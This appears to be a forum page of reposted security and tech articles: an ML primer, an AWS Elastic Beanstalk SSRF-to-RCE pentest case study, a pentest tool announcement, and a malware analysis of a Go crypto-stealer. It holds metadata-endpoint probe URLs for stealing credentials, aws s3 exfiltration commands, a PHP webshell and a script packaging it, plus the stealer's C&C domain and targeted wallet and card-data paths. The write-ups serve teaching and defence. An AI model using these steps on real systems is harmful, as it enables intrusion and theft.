
Leaderboard

Popular Content

Showing content with the highest reputation on 02/08/19 in all areas

  1. Machine Learning for Everyone In simple words. With real-world examples. Yes, again 21 November 2018 :: 28834 views :: 8137 words This article in other languages: Russian (original) Special thanks for help: @wcarss, @sudodoki and my wife ❤️

Machine Learning is like sex in high school. Everyone is talking about it, a few know what to do, and only your teacher is doing it. If you ever tried to read articles about machine learning on the Internet, most likely you stumbled upon two types of them: thick academic trilogies filled with theorems (I couldn’t even get through half of one) or fishy fairytales about artificial intelligence, data-science magic, and jobs of the future.

I decided to write the post I’d been wishing existed for a long time: a simple introduction for those who always wanted to understand machine learning. Only real-world problems, practical solutions, simple language, and no high-level theorems. One for everyone, whether you are a programmer or a manager. Let's roll.

Why do we want machines to learn? This is Billy. Billy wants to buy a car. He tries to calculate how much he needs to save monthly for that. He went over dozens of ads on the internet and learned that new cars are around $20,000, used year-old ones are $19,000, 2-year-old ones are $18,000, and so on. Billy, our brilliant analyst, starts seeing a pattern: the car price depends on its age and drops $1,000 every year, but won't go lower than $10,000.

In machine learning terms, Billy invented regression – he predicted a value (price) based on known historical data. People do it all the time, whether trying to estimate a reasonable cost for a used iPhone on eBay or figuring out how many ribs to buy for a BBQ party. 200 grams per person? 500? Yeah, it would be nice to have a simple formula for every problem in the world. Especially for a BBQ party. Unfortunately, it's impossible. Let's get back to cars.
The problem is, cars have different manufacturing dates, dozens of options, varying technical condition, seasonal demand spikes, and god only knows how many more hidden factors. An average Billy can't keep all that data in his head while calculating the price. Me neither. People are dumb and lazy – we need robots to do the maths for them. So, let's go the computational way here: let's provide the machine some data and ask it to find all the hidden patterns related to price. Aaaand it works. The most exciting thing is that the machine copes with this task much better than a real person does when carefully analyzing all the dependencies in their mind. That was the birth of machine learning. Full article: https://vas3k.com/blog/machine_learning/
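Billy's "invented regression" can be written down in a few lines. A minimal sketch, assuming nothing beyond the article's own numbers ($20,000 new, roughly $1,000 less per year, $10,000 floor): fit price = a * age + b with ordinary least squares, then clamp the prediction.

```python
# Fit price = a * age + b from (age, price) observations via least squares.
# The data points are the article's examples; everything else is illustrative.

def fit_line(points):
    """Least-squares fit of y = a * x + b over (x, y) pairs."""
    n = len(points)
    sx = sum(x for x, _ in points)
    sy = sum(y for _, y in points)
    sxx = sum(x * x for x, _ in points)
    sxy = sum(x * y for x, y in points)
    a = (n * sxy - sx * sy) / (n * sxx - sx * sx)
    b = (sy - a * sx) / n
    return a, b

# Age in years vs. asking price: $20,000 new, minus roughly $1,000 per year.
ads = [(0, 20000), (1, 19000), (2, 18000), (3, 17000)]
slope, intercept = fit_line(ads)
print(slope, intercept)  # -1000.0 20000.0

def predict(age):
    # Billy's extra rule: the price never drops below $10,000.
    return max(slope * age + intercept, 10000)
```

Real ads are noisier than this toy data, which is exactly the article's point: with dozens of hidden factors the fit is no longer something Billy can do in his head.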
    1 point
  2. Exploiting SSRF in AWS Elastic Beanstalk February 1, 2019 In this blog, Sunil Yadav, our lead trainer for the “Advanced Web Hacking” training class, will discuss a case study where a Server-Side Request Forgery (SSRF) vulnerability was identified and exploited to gain access to sensitive data such as the source code. Further, the blog discusses the potential areas which could lead to Remote Code Execution (RCE) on an application deployed on AWS Elastic Beanstalk with a Continuous Deployment (CD) pipeline. AWS Elastic Beanstalk AWS Elastic Beanstalk is a Platform as a Service (PaaS) offering from AWS for deploying and scaling web applications developed for various environments such as Java, .NET, PHP, Node.js, Python, Ruby and Go. It automatically handles deployment, capacity provisioning, load balancing, auto-scaling, and application health monitoring. Provisioning an Environment AWS Elastic Beanstalk supports Web Server and Worker environment provisioning. Web Server environment – typically suited to running a web application or web APIs. Worker environment – suited for background jobs and long-running processes. A new application can be configured by providing some information about the application and environment, and uploading the application code as a zip or war file. Figure 1: Creating an Elastic Beanstalk Environment When a new environment is provisioned, AWS creates an S3 storage bucket, a Security Group, and an EC2 instance. It also creates a default instance profile, called aws-elasticbeanstalk-ec2-role, which is mapped to the EC2 instance with default permissions. When the code is deployed from the user's computer, a copy of the source code is placed as a zip file in the S3 bucket named elasticbeanstalk-region-account-id. Figure 2: Amazon S3 buckets Elastic Beanstalk doesn’t turn on default encryption for the Amazon S3 bucket that it creates. This means that by default, objects are stored unencrypted in the bucket (and are accessible only by authorized users).
Read more: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/AWSHowTo.S3.html Managed Policies for the default Instance Profile – aws-elasticbeanstalk-ec2-role: AWSElasticBeanstalkWebTier – Grants permissions for the application to upload logs to Amazon S3 and debugging information to AWS X-Ray. AWSElasticBeanstalkWorkerTier – Grants permissions for log uploads, debugging, metric publication, and worker instance tasks, including queue management, leader election, and periodic tasks. AWSElasticBeanstalkMulticontainerDocker – Grants permissions for the Amazon Elastic Container Service to coordinate cluster tasks. The policy “AWSElasticBeanstalkWebTier” allows limited List, Read and Write permissions on S3 buckets. Buckets are accessible only if the bucket name starts with “elasticbeanstalk-”, and recursive access is also granted. Figure 3: Managed Policy – “AWSElasticBeanstalkWebTier” Read more: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/concepts.html Analysis While we were continuing with our regular pentest, we came across a Server-Side Request Forgery (SSRF) vulnerability in the application. The vulnerability was confirmed by making a DNS call to an external domain, and this was further verified by accessing “http://localhost/server-status”, which was configured to allow access only from localhost, as shown in Figure 4 below. http://staging.xxxx-redacted-xxxx.com/view_pospdocument.php?doc=http://localhost/server-status Figure 4: Confirming SSRF by accessing the restricted page Once SSRF was confirmed, we then moved towards confirming that the service provider was Amazon through server fingerprinting, using services such as https://ipinfo.io.
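The probe above is just the vulnerable `doc` parameter carrying an attacker-chosen URL. A minimal sketch of how such probe URLs are assembled; the parameter name and the localhost target come from the article, while the staging hostname is a placeholder (the real one is redacted):

```python
# Build an SSRF probe URL: the target URL travels inside the vulnerable
# `doc` query parameter. Hostname below is a stand-in for the redacted one.
from urllib.parse import urlencode

def build_probe(base, target):
    return base + "?" + urlencode({"doc": target})

url = build_probe(
    "http://staging.example.com/view_pospdocument.php",
    "http://localhost/server-status",
)
print(url)
```

The same builder works for the metadata endpoints used in the next step, by swapping the target for `http://169.254.169.254/...`.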
Thereafter, we tried querying AWS metadata through multiple endpoints, such as: http://169.254.169.254/latest/dynamic/instance-identity/document http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role We retrieved the account ID and region from the API “http://169.254.169.254/latest/dynamic/instance-identity/document”: Figure 5: AWS Metadata – Retrieving the Account ID and Region We then retrieved the Access Key, Secret Access Key, and Token from the API “http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role”: Figure 6: AWS Metadata – Retrieving the Access Key ID, Secret Access Key, and Token Note: The IAM security credential of “aws-elasticbeanstalk-ec2-role” indicates that the application is deployed on Elastic Beanstalk. We further configured the AWS Command Line Interface (CLI), as shown in Figure 7: Figure 7: Configuring AWS Command Line Interface The output of the “aws sts get-caller-identity” command indicated that the token was working fine, as shown in Figure 8: Figure 8: AWS CLI Output: get-caller-identity So far, so good. Pretty standard SSRF exploit, right? This is where it got interesting… Let’s explore further possibilities Initially, we tried running multiple commands using the AWS CLI to retrieve information from the AWS instance. However, access to most of the commands was denied due to the security policy in place, as shown in Figure 9 below: Figure 9: Access denied on ListBuckets operation We also know that the managed policy “AWSElasticBeanstalkWebTier” only allows access to S3 buckets whose names start with “elasticbeanstalk”: So, in order to access the S3 bucket, we needed to know the bucket name. Elastic Beanstalk creates an Amazon S3 bucket named elasticbeanstalk-region-account-id. We found out the bucket name using the information retrieved earlier, as shown in Figure 4.
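The two metadata facts above are all that is needed: the instance-identity document is JSON carrying the account ID and region, and Elastic Beanstalk's bucket follows a fixed naming scheme. A sketch of the deduction (the JSON below is a made-up sample reusing the article's partially redacted values; the instance ID is invented):

```python
# Parse an instance-identity document and derive the Elastic Beanstalk
# bucket name (elasticbeanstalk-<region>-<account-id>). Sample JSON only.
import json

sample_doc = """{
  "accountId": "69XXXXXXXX79",
  "region": "us-east-2",
  "instanceId": "i-0123456789abcdef0"
}"""

doc = json.loads(sample_doc)
bucket = f"elasticbeanstalk-{doc['region']}-{doc['accountId']}"
print(bucket)  # elasticbeanstalk-us-east-2-69XXXXXXXX79
```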
Region: us-east-2 Account ID: 69XXXXXXXX79 So the bucket name is “elasticbeanstalk-us-east-2-69XXXXXXXX79”. We listed the bucket's resources recursively using the AWS CLI: aws s3 ls s3://elasticbeanstalk-us-east-2-69XXXXXXXX79/ Figure 10: Listing S3 Bucket for Elastic Beanstalk We got access to the source code by downloading the S3 resources recursively, as shown in Figure 11: aws s3 cp s3://elasticbeanstalk-us-east-2-69XXXXXXXX79/ /home/foobar/awsdata --recursive Figure 11: Recursively copy all S3 Bucket Data Pivoting from SSRF to RCE Now that we had permission to add an object to the S3 bucket, we uploaded a PHP file (webshell101.php inside the zip file) through the AWS CLI to explore the possibility of remote code execution. It didn't work, as the updated source code was not deployed on the EC2 instance, as shown in Figure 12 and Figure 13: Figure 12: Uploading a webshell through AWS CLI in the S3 bucket Figure 13: 404 Error page for Web Shell in the current environment We took this to our lab to explore potential exploitation scenarios where this issue could lead to an RCE. Potential scenarios were: Using CI/CD AWS CodePipeline Rebuilding the existing environment Cloning from an existing environment Creating a new environment with an S3 bucket URL Using CI/CD AWS CodePipeline: AWS CodePipeline is a CI/CD service which builds, tests and deploys code every time there is a code change (based on the policy). The pipeline supports GitHub, Amazon S3 and AWS CodeCommit as source providers and multiple deployment providers, including Elastic Beanstalk. The AWS official blog on how this works can be found here: The software release, in the case of our application, is automated using AWS CodePipeline, with the S3 bucket as the source repository and Elastic Beanstalk as the deployment provider.
Let’s first create a pipeline, as seen in Figure 14: Figure 14: Pipeline settings Select S3 as the source provider, choose the S3 bucket name and enter the object key, as shown in Figure 15: Figure 15: Add source stage Configure a build provider or skip the build stage, as shown in Figure 16: Figure 16: Skip build stage Add Amazon Elastic Beanstalk as the deploy provider and select an application created with Elastic Beanstalk, as shown in Figure 17: Figure 17: Add deploy provider A new pipeline is created as shown below in Figure 18: Figure 18: New Pipeline created successfully Now, it’s time to upload a new file (webshell) to the S3 bucket to execute system-level commands, as shown in Figure 19: Figure 19: PHP webshell Add the file to the object configured in the source provider, as shown in Figure 20: Figure 20: Add webshell in the object Upload the archive file to the S3 bucket using the AWS CLI command, as shown in Figure 21: Figure 21: Copy webshell to S3 bucket aws s3 cp 2019028gtB-InsuranceBroking-stag-v2.0024.zip s3://elasticbeanstalk-us-east-1-696XXXXXXXXX/ The moment the new file is uploaded, CodePipeline immediately starts the build process, and if everything is OK, it will deploy the code on the Elastic Beanstalk environment, as shown in Figure 22: Figure 22: Pipeline Triggered Once the pipeline has completed, we can access the web shell and execute arbitrary commands on the system, as shown in Figure 23. Figure 23: Running system level commands And here we got a successful RCE! Rebuilding the existing environment: Rebuilding an environment terminates all of its resources, removes them, and creates new resources. So in this scenario, it will deploy the latest available source code from the S3 bucket. The latest source code contains the web shell, which gets deployed, as shown in Figure 24.
Figure 24: Rebuilding the existing environment Once the rebuilding process has successfully completed, we can access our webshell and run system level commands on the EC2 instance, as shown in Figure 25: Figure 25: Running system level commands from webshell101.php Cloning from the existing environment: If the application owner clones the environment, it again takes the code from the S3 bucket, deploying the application with the web shell. The environment cloning process is shown in Figure 26: Figure 26: Cloning from an existing Environment Creating a new environment: While creating a new environment, AWS provides two options to deploy code: uploading an archive file directly, or selecting an existing archive file from the S3 bucket. By selecting the S3 bucket option and providing an S3 bucket URL, the latest source code will be used for deployment. The latest source code contains the web shell, which gets deployed. References: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/concepts.html https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/iam-instanceprofile.html https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/AWSHowTo.S3.html https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-welcome.html https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb https://ipinfo.io Our Advanced Web Hacking class at Black Hat USA contains this and many more real-world examples. Registration is now open. Source: https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/
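In every scenario above, the payload is the same: a webshell added to the source archive that Elastic Beanstalk later deploys. A sketch of that packaging step, assuming nothing beyond the article's file name webshell101.php (the archive contents and app placeholder are invented, and everything stays in an in-memory buffer):

```python
# Package a PHP webshell into the deployment zip, as in the article's upload
# step. The index.php placeholder and archive layout are illustrative.
import io
import zipfile

shell_php = "<?php system($_GET['cmd']); ?>"  # classic one-line PHP webshell

buf = io.BytesIO()
with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
    zf.writestr("index.php", "<?php echo 'app'; ?>")  # stand-in app code
    zf.writestr("webshell101.php", shell_php)

# Re-open the archive to confirm what the pipeline would deploy.
with zipfile.ZipFile(io.BytesIO(buf.getvalue())) as zf:
    names = zf.namelist()
print(names)  # ['index.php', 'webshell101.php']
```

The resulting zip is what gets copied to the elasticbeanstalk-* bucket with `aws s3 cp`, after which any rebuild, clone, or pipeline run deploys the shell.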
    1 point
  3. Introducing Armory: External Pentesting Like a Boss Posted by Dan Lawson on February 04, 2019 Link TL;DR: We are introducing Armory, a tool that adds a database backend to dozens of popular external and discovery tools. This allows you to run the tools directly from Armory, automatically ingest the results back into the database, and use the new data to supply targets for other tools. Why? Over the past few years I’ve spent a lot of time conducting some relatively large-scale external penetration tests. This ends up being a massive exercise in managing various text files, with a moderately unhealthy dose of grep, cut, sed, and sort. It gets even more interesting as you discover new domains, new IP ranges, or other new assets and must start the entire process over again. Long story short, I realized that if I could automate handling the data, my time would be freed up for actual testing and exploitation. So, Armory was born. What? Armory is written in Python. It works with both Python 2 and Python 3. It is composed of the main application, as well as modules and reports. Modules are wrapper scripts that run public (or private) tools using either data from the command line or data in the database. The results are then either processed and imported into the database or left in their text files for manual perusal. The database handles the following types of data: BaseDomains: Base domain names, mainly used in domain enumeration tools Domains: All discovered domains (and subdomains) IPs: IP addresses discovered CIDRs: CIDRs that these IP addresses reside in, along with their owners, pulled from whois data ScopeCIDRs: CIDRs that are explicitly added as in scope. This is separated from CIDRs since whois servers will often return much larger CIDRs than may belong to a target/customer. Ports: Port numbers and services, usually populated by Nmap, Nessus, or Shodan Users: Users discovered via various means (leaked cred databases, LinkedIn, etc.)
Creds: Sets of credentials discovered Additionally, with BaseDomains, Domains and IPs you have two types of scoping: Active scope: Host is in scope and can have bad-touch tools run on it (i.e. nmap, gobuster, etc.). Passive scope: Host isn’t directly in scope but can have enumeration tools run against it (i.e. aquatone, sublist3r, etc.). If something is Active scoped, it should also be Passive scoped. The main purpose of Passive scoping is to handle situations where you may want data ingested into the database and the data may be useful to your customers, but you do not want to actively attack those targets. Take the following scenario: you are doing discovery and an external penetration test for a client, trying to find all of their assets. You find a few dozen random domains registered to that client, but you are explicitly scoped to the subnets that they own. During the subdomain enumeration, you discover multiple development web servers hosted on Digital Ocean. Since you do not have permission to test against Digital Ocean, you don't want to actively attack them. However, this would still be valuable information for the client to receive. Therefore you can leave those hosts scoped Passive, and no active tools will be run on them. You can still generate reports later on that include the passive hosts, thereby capturing the data without breaking scope. Full details: https://depthsecurity.com/blog/introducing-armory-external-pentesting-like-a-boss
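The two-level scoping described above can be sketched as a tiny data model. This is not Armory's actual implementation, just an illustration of the active/passive semantics from the post (field and function names are hypothetical):

```python
# Minimal model of Armory-style scoping: active ("bad-touch") tools require
# active scope; passive enumeration tools only require passive scope.
from dataclasses import dataclass

@dataclass
class Host:
    name: str
    active_scope: bool = False
    passive_scope: bool = False

def may_run(host, tool_is_active):
    """Gate a tool run on the host's scope flags."""
    return host.active_scope if tool_is_active else host.passive_scope

client = Host("app.client.example", active_scope=True, passive_scope=True)
droplet = Host("dev.thirdparty.example", passive_scope=True)  # report-only

print(may_run(client, tool_is_active=True))    # nmap allowed
print(may_run(droplet, tool_is_active=True))   # out of active scope
print(may_run(droplet, tool_is_active=False))  # sublist3r allowed
```

The Digital Ocean scenario in the post maps to the `droplet` host: passive-scoped, so it appears in reports but never gets actively attacked.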
    1 point
  4. Analyzing a new stealer written in Golang Posted: January 30, 2019 by hasherezade Golang (Go) is a relatively new programming language, and it is not common to find malware written in it. However, new variants written in Go are slowly emerging, presenting a challenge to malware analysts. Applications written in this language are bulky and look much different under a debugger from those that are compiled in other languages, such as C/C++. Recently, a new variant of the Zebrocy malware was observed that was written in Go (detailed analysis available here). We captured another type of malware written in Go in our lab. This time, it was a pretty simple stealer, detected by Malwarebytes as Trojan.CryptoStealer.Go. This post will provide detail on its functionality, but also show methods and tools that can be applied to analyze other malware written in Go. Analyzed sample This stealer is detected by Malwarebytes as Trojan.CryptoStealer.Go: 992ed9c632eb43399a32e13b9f19b769c73d07002d16821dde07daa231109432 513224149cd6f619ddeec7e0c00f81b55210140707d78d0e8482b38b9297fc8f 941330c6be0af1eb94741804ffa3522a68265f9ff6c8fd6bcf1efb063cb61196 – HyperCheats.rar (original package) 3fcd17aa60f1a70ba53fa89860da3371a1f8de862855b4d1e5d0eb8411e19adf – HyperCheats.exe (UPX packed) 0bf24e0bc69f310c0119fc199c8938773cdede9d1ca6ba7ac7fea5c863e0f099 – unpacked Behavioral analysis Under the hood, Golang calls the Windows API, and we can trace the calls using typical tools, for example, PIN tracers.
We see that the malware searches for files under the following paths:
"C:\Users\tester\AppData\Local\Uran\User Data\"
"C:\Users\tester\AppData\Local\Amigo\User\User Data\"
"C:\Users\tester\AppData\Local\Torch\User Data\"
"C:\Users\tester\AppData\Local\Chromium\User Data\"
"C:\Users\tester\AppData\Local\Nichrome\User Data\"
"C:\Users\tester\AppData\Local\Google\Chrome\User Data\"
"C:\Users\tester\AppData\Local\360Browser\Browser\User Data\"
"C:\Users\tester\AppData\Local\Maxthon3\User Data\"
"C:\Users\tester\AppData\Local\Comodo\User Data\"
"C:\Users\tester\AppData\Local\CocCoc\Browser\User Data\"
"C:\Users\tester\AppData\Local\Vivaldi\User Data\"
"C:\Users\tester\AppData\Roaming\Opera Software\"
"C:\Users\tester\AppData\Local\Kometa\User Data\"
"C:\Users\tester\AppData\Local\Comodo\Dragon\User Data\"
"C:\Users\tester\AppData\Local\Sputnik\Sputnik\User Data\"
"C:\Users\tester\AppData\Local\Google (x86)\Chrome\User Data\"
"C:\Users\tester\AppData\Local\Orbitum\User Data\"
"C:\Users\tester\AppData\Local\Yandex\YandexBrowser\User Data\"
"C:\Users\tester\AppData\Local\K-Melon\User Data\"
Those paths point to data stored by browsers. One interesting fact is that one of the paths points to the Yandex browser, which is popular mainly in Russia. The next searched path is the desktop: "C:\Users\tester\Desktop\*" All files found there are copied to a folder created in %APPDATA%. The folder “Desktop” contains all the TXT files copied from the Desktop and its sub-folders. Example from our test machine: After the search is completed, the files are zipped. We can see this packet being sent to the C&C (cu23880.tmweb.ru/landing.php). Golang-compiled binaries are usually big, so it’s no surprise that the sample has been packed with UPX to minimize its size. We can unpack it easily with the standard UPX tool. As a result, we get a plain Go binary.
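The path list above reduces to a pattern: per-user browser profile directories under AppData. A small defensive sketch that rebuilds the same paths for a given profile root, e.g. for triaging which artifacts a machine actually has (browser list trimmed; the relative paths come from the trace above):

```python
# Rebuild the stealer's targeted browser-profile paths for a user root.
# Windows-style paths are built as plain strings so the logic is portable.
BROWSER_DATA = [
    r"AppData\Local\Google\Chrome\User Data",
    r"AppData\Local\Yandex\YandexBrowser\User Data",
    r"AppData\Local\Vivaldi\User Data",
    r"AppData\Roaming\Opera Software",
]

def targeted_paths(user_root):
    return [user_root + "\\" + p for p in BROWSER_DATA]

paths = targeted_paths(r"C:\Users\tester")
for p in paths:
    print(p)
```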
The export table reveals the compilation path and some other interesting functions: Looking at those exports, we can get an idea of the static libraries used inside. Many of those functions (trampoline-related) can be found in the module sqlite-3: https://github.com/mattn/go-sqlite3/blob/master/callback.go. Function crosscall2 comes from the Go runtime, and it is related to calling Go from C/C++ applications (https://golang.org/src/cmd/cgo/out.go). Tools For the analysis, I used IDA Pro along with the IDAGolangHelper scripts written by George Zaytsev. First, the Go executable has to be loaded into IDA. Then, we can run the script from the menu (File –> script file). We then see the following menu, giving access to particular features: First, we need to determine the Golang version (the script offers some helpful heuristics). In this case, it will be Go 1.2. Then, we can rename functions and add standard Go types. After completing those operations, the code looks much more readable. Below, you can see the view of the functions before and after using the scripts. Before (only the exported functions are named): After (most of the functions have their names automatically resolved and added): Many of those functions come from statically-linked libraries. So, we need to focus primarily on the functions annotated as main_* – those are specific to the particular executable. Code overview In the function “main_init”, we can see the modules that will be used in the application: It is statically linked with the following modules: GRequests (https://github.com/levigross/grequests) go-sqlite3 (https://github.com/mattn/go-sqlite3) try (https://github.com/manucorporat/try) Analyzing this function can help us predict the functionality; i.e., looking at the above libraries, we can see that the malware will be communicating over the network, reading SQLite3 databases, and throwing exceptions. Other initializers suggest the use of regular expressions, the zip format, and reading environment variables.
This function is also responsible for initializing and mapping strings. We can see that some of them are first base64 decoded: In the string initializers, we see references to cryptocurrency wallets. Ethereum: Monero: The main function of a Golang binary is annotated “main_main”. Here, we can see that the application is creating a new directory (using the function os.Mkdir). This is the directory where the found files will be copied. After that, several Goroutines are started using runtime.newproc. (Goroutines can be used similarly to threads, but they are managed differently. More details can be found here). Those routines are responsible for searching for the files. Meanwhile, the Sqlite module is used to parse the databases in order to steal data. Then, the malware zips it all into one package, and finally, the package is uploaded to the C&C. What was stolen? To see exactly which data the attacker is interested in, we can look more closely at the functions that are performing SQL queries, and at the related strings. Strings in Golang are stored in bulk, in concatenated form: Later, a single chunk from such a bulk is retrieved on demand. Therefore, seeing from which place in the code each string was referenced is not so easy. Below is a fragment of the code where an “sqlite3” database is opened (a string of length 7 was retrieved): Another example: This query was retrieved from the full chunk of strings, by a given offset and length: Let’s take a look at which data those queries were trying to fetch.
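The bulk string storage just described can be shown in miniature: Go keeps string data concatenated and hands out (offset, length) slices of it, which is why "sqlite3" appears in the disassembly as a length-7 fetch from a larger blob. The blob contents below are illustrative, not taken from the binary:

```python
# Go-style bulk string retrieval: strings live concatenated in one blob,
# and each use pulls a slice by offset and length.
BLOB = "sqlite3select email FROM autofill_profile_emailsmain_main"

def go_string(blob, offset, length):
    return blob[offset:offset + length]

print(go_string(BLOB, 0, 7))   # sqlite3
print(go_string(BLOB, 7, 41))  # select email FROM autofill_profile_emails
```

This is also why cross-referencing strings in a Go binary is harder than in C: there is no per-string NUL terminator to anchor on, only (offset, length) pairs scattered through the code.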
Fetching the strings referenced by the calls, we can retrieve and list all of them:
select name_on_card, expiration_month, expiration_year, card_number_encrypted, billing_address_id FROM credit_cards
select * FROM autofill_profiles
select email FROM autofill_profile_emails
select number FROM autofill_profile_phone
select first_name, middle_name, last_name, full_name FROM autofill_profile_names
We can see that the browser’s database is queried in search of data related to online transactions: credit card numbers and expiration dates, as well as personal data such as names and email addresses. The paths to all the files being searched are stored as base64 strings. Many of them are related to cryptocurrency wallets, but we can also find references to the Telegram messenger.
Software\\Classes\\tdesktop.tg\\shell\\open\\command
\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\
\\AppData\\Roaming\\Electrum\\wallets\\default_wallet
\\AppData\\Local\\Torch\\User Data\\
\\AppData\\Local\\Uran\\User Data\\
\\AppData\\Roaming\\Opera Software\\
\\AppData\\Local\\Comodo\\User Data\\
\\AppData\\Local\\Chromium\\User Data\\
\\AppData\\Local\\Chromodo\\User Data\\
\\AppData\\Local\\Kometa\\User Data\\
\\AppData\\Local\\K-Melon\\User Data\\
\\AppData\\Local\\Orbitum\\User Data\\
\\AppData\\Local\\Maxthon3\\User Data\\
\\AppData\\Local\\Nichrome\\User Data\\
\\AppData\\Local\\Vivaldi\\User Data\\
\\AppData\\Roaming\\BBQCoin\\wallet.dat
\\AppData\\Roaming\\Bitcoin\\wallet.dat
\\AppData\\Roaming\\Ethereum\\keystore
\\AppData\\Roaming\\Exodus\\seed.seco
\\AppData\\Roaming\\Franko\\wallet.dat
\\AppData\\Roaming\\IOCoin\\wallet.dat
\\AppData\\Roaming\\Ixcoin\\wallet.dat
\\AppData\\Roaming\\Mincoin\\wallet.dat
\\AppData\\Roaming\\YACoin\\wallet.dat
\\AppData\\Roaming\\Zcash\\wallet.dat
\\AppData\\Roaming\\devcoin\\wallet.dat
Big but unsophisticated malware Some of the concepts used in this malware remind us of other stealers, such as Evrial, PredatorTheThief, and Vidar.
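What the autofill queries above return can be demonstrated against a throwaway in-memory database shaped like the browser store they target; the schema below is trimmed to the columns the stealer selects, and the row is fake:

```python
# Replay the stealer's credit_cards query against a fake in-memory database
# to show the shape of the stolen records. Schema and data are illustrative.
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("""CREATE TABLE credit_cards (
    name_on_card TEXT, expiration_month INT, expiration_year INT,
    card_number_encrypted BLOB, billing_address_id INT)""")
con.execute("INSERT INTO credit_cards VALUES ('J. Doe', 4, 2021, x'00', 1)")

rows = con.execute(
    "select name_on_card, expiration_month, expiration_year,"
    " card_number_encrypted, billing_address_id FROM credit_cards"
).fetchall()
print(rows)  # [('J. Doe', 4, 2021, b'\x00', 1)]
```

Note that card_number_encrypted really is encrypted at rest in the browser's store; a stealer still needs the per-user key material to recover plaintext numbers.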
It has similar targets and also sends the stolen data as a ZIP file to the C&C. However, there is no proof that the author of this stealer is somehow linked with those cases. When we take a look at the implementation as well as the functionality of this malware, it’s rather simple. Its big size comes from the many statically-compiled modules. Possibly, this malware is in the early stages of development; its author may have just started learning Go and is experimenting. We will be keeping an eye on its development. At first, analyzing a Golang-compiled application might feel overwhelming because of its huge codebase and unfamiliar structure. But with the help of proper tools, security researchers can easily navigate this labyrinth, as all the functions are labeled. Since Golang is a relatively new programming language, we can expect that the tools to analyze it will mature with time. Is malware written in Go an emerging trend in threat development? It’s a little too soon to tell. But we do know that awareness of malware written in new languages is important for our community. Source: https://blog.malwarebytes.com/threat-analysis/2019/01/analyzing-new-stealer-written-golang/
    1 point
  5. I also do customizations, but not on CMSes. Let's keep in touch.
    1 point
  6. Update. I've updated the topic. The site is coming soon as well.
    1 point